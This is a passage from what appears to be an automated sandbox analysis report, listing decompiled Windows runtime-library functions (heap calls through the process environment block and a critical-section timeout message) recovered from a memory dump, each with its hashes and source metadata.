                        					 *_t3 =  *_t3 | 0x00000400;
                        					return _t3;
                        				}
                        			}






                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                        • Instruction ID: 1fba16aef53ad68194827946538445d9e8b75b5b638d7a71b7c048d7ab3d9930
                        • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                        • Instruction Fuzzy Hash: 3EC08C70280A00AAEB221F20CD01F0036A2BB00B09F8404E07300DB0F0DB7CD801EA00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02B7A537(intOrPtr _a4, intOrPtr _a8) {
                        
                        				return L02B18E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
                        			}



                        0x02b7a553

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                        • Instruction ID: 468e30f0d1ecdefa8fefee41761b20ec45e58044ea5c10b362df48c2a741d75e
                        • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                        • Instruction Fuzzy Hash: 40C01233180248BBCB126E81CC00F067F2AFB94B60F008010BA080A5608632E970EA84
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02B13A1C(intOrPtr _a4) {
                        				void* _t5;
                        
                        				return L02B14620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                        			}




                        0x02b13a35

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                        • Instruction ID: d885ee42709046f2247471e7bed2a237f23a361db5ddeb1e99ccd1a9b180fc1c
                        • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                        • Instruction Fuzzy Hash: 83C08C32080248BBC7126E41DC00F017B2AE790B60F000060B6040A5608532EC60D988
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02B076E2(void* __ecx) {
                        				void* _t5;
                        
                        				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
                        					return L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                        				}
                        				return _t5;
                        			}





                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                        • Instruction ID: fc68c59f7b27469b0d05f967ba4654f96649a0097cdad0fe34e17cb02c92d05d
                        • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                        • Instruction Fuzzy Hash: 32C08C702411805AEB2B5748CE60B20FA50EF08708F8801DCAA020A4E1CB68B802E688
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02B236CC(void* __ecx) {
                        
                        				if(__ecx > 0x7fffffff) {
                        					return 0;
                        				} else {
                        					return L02B14620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                        				}
                        			}




                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                        • Instruction ID: de8b7339be51081a0cc406cdd04f486e9c4562f5ab57590e5ef54897ff9801cf
                        • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                        • Instruction Fuzzy Hash: BCC02BF0154440BBD7161F30CD00F1472A9F700B21FA403D47220454F0D63C9C00D500
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02AFAD30(intOrPtr _a4) {
                        
                        				return L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                        			}



                        0x02afad49

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                        • Instruction ID: 19d8e3d323321daa3673549369b207a656d952a7a0d8b3c5a4af69fc218a388f
                        • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                        • Instruction Fuzzy Hash: 02C08C32080248BBC7126B45CD00F01BB2AEB90B60F000020B6040B6618A32E860E988
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02B17D50() {
                        				intOrPtr* _t3;
                        
                        				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                        				if(_t3 != 0) {
                        					return  *_t3;
                        				} else {
                        					return _t3;
                        				}
                        			}





                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                        • Instruction ID: 11337aa7e043d3914132e658bbc40de2da5d97849f766f83cd9f3e7dc6cd7ea9
                        • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                        • Instruction Fuzzy Hash: 3EB092343019408FCE16DF18C080B1573F4FB49A40B8440D0E400CBA20D729E8009900
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02B22ACB() {
                        				void* _t5;
                        
                        				return E02B0EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                        			}




                        0x02b22adc

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                        • Instruction ID: f553b3d0b0456a98252166fc922354e31641f7068f7ef4d5905b9aec8d0e0fe9
                        • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                        • Instruction Fuzzy Hash: F1B092328104408BCF02AB40C690A197772AB00750F0588909001279608228AC01CA40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 53%
                        			E02B8FDDA(intOrPtr* __edx, intOrPtr _a4) {
                        				void* _t7;
                        				intOrPtr _t9;
                        				intOrPtr _t10;
                        				intOrPtr* _t12;
                        				intOrPtr* _t13;
                        				intOrPtr _t14;
                        				intOrPtr* _t15;
                        
                        				_t13 = __edx;
                        				_push(_a4);
                        				_t14 =  *[fs:0x18];
                        				_t15 = _t12;
                        				_t7 = E02B3CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                        				_push(_t13);
                        				E02B85720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                        				_t9 =  *_t15;
                        				if(_t9 == 0xffffffff) {
                        					_t10 = 0;
                        				} else {
                        					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                        				}
                        				_push(_t10);
                        				_push(_t15);
                        				_push( *((intOrPtr*)(_t15 + 0xc)));
                        				_push( *((intOrPtr*)(_t14 + 0x24)));
                        				return E02B85720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                        			}











                        APIs
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02B8FDFA
                        Strings
                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02B8FE2B
                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02B8FE01
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                        • API String ID: 885266447-3903918235
                        • Opcode ID: f5640d7be6ced0dc57c23b5dbcaedefdc734118ee43052ca5f4097b71d0db982
                        • Instruction ID: 46f05603a296ffe4847ad895bd20643436fe3580cad55f0907ef3b3a57b73b28
                        • Opcode Fuzzy Hash: f5640d7be6ced0dc57c23b5dbcaedefdc734118ee43052ca5f4097b71d0db982
                        • Instruction Fuzzy Hash: 40F0C236200201BBEA302A55DC02F23BB5BEB84731F154255F62D565D1DA62B860C7A0
                        Uniqueness

                        Uniqueness Score: -1.00%